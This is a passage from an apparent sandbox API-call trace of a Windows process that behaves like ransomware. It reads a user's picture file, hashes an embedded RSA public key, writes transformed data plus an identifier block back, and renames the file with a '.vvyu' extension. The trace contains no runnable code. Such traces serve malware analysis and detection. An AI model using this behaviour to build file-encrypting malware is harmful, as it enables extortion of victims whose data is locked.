dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.586] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xa0a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.586] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.589] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.589] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xa0cd, lpOverlapped=0x0) returned 1 [0199.590] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.590] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.590] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.590] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.591] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.591] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.591] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.591] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.591] GetLastError () returned 0x0 [0199.591] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.592] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.592] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.592] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.592] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0d0) returned 0x2ea79b0 [0199.593] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f540 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f588 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.594] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31d0 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea31b8 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.597] GetCurrentThreadId () returned 0x66c [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea67c0 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.598] GetCurrentThreadId () returned 0x66c [0199.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31d0 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3230 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3248 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31e8 [0199.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31b8 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f588 | out: hHeap=0x620000) returned 1 [0199.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0199.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.609] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xa0c8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xa0c8, lpOverlapped=0x0) returned 1 [0199.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.610] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xa0cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.610] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0199.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0199.611] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.612] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.612] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.612] CloseHandle (hObject=0x510) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0199.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0199.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.614] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\v97V_KMwmgn4h6UDx.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\v97v_kmwmgn4h6udx.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\v97V_KMwmgn4h6UDx.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\v97v_kmwmgn4h6udx.jpg.vvyu")) returned 1 [0199.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.616] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0199.618] FindNextFileW (in: 